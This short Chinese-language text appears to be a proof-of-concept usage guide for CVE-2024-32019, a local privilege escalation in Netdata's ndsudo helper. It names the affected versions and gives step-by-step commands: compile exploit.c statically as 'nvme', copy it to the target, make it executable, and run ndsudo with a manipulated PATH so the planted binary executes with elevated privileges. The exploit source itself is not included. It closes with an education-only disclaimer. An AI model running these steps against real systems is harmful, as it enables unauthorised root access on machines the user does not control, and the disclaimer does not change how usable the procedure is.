>= v1.45.0, < v1.45.3>= v1.44.0-60, < v1.45.0-169CVE-2024-32019 — ndsudo 本地权限提升通过不受信任的搜索路径。
x86_64-linux-gnu-gcc -o nvme exploit.c -static
将编译好的二进制文件传输到易受攻击的机器上。
使其可执行:
chmod +x nvme
通过 PATH 操纵利用易受攻击的二进制文件(使用你上传二进制文件的相同路径):
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
此概念验证(PoC)代码仅供教育和授权渗透测试目的使用。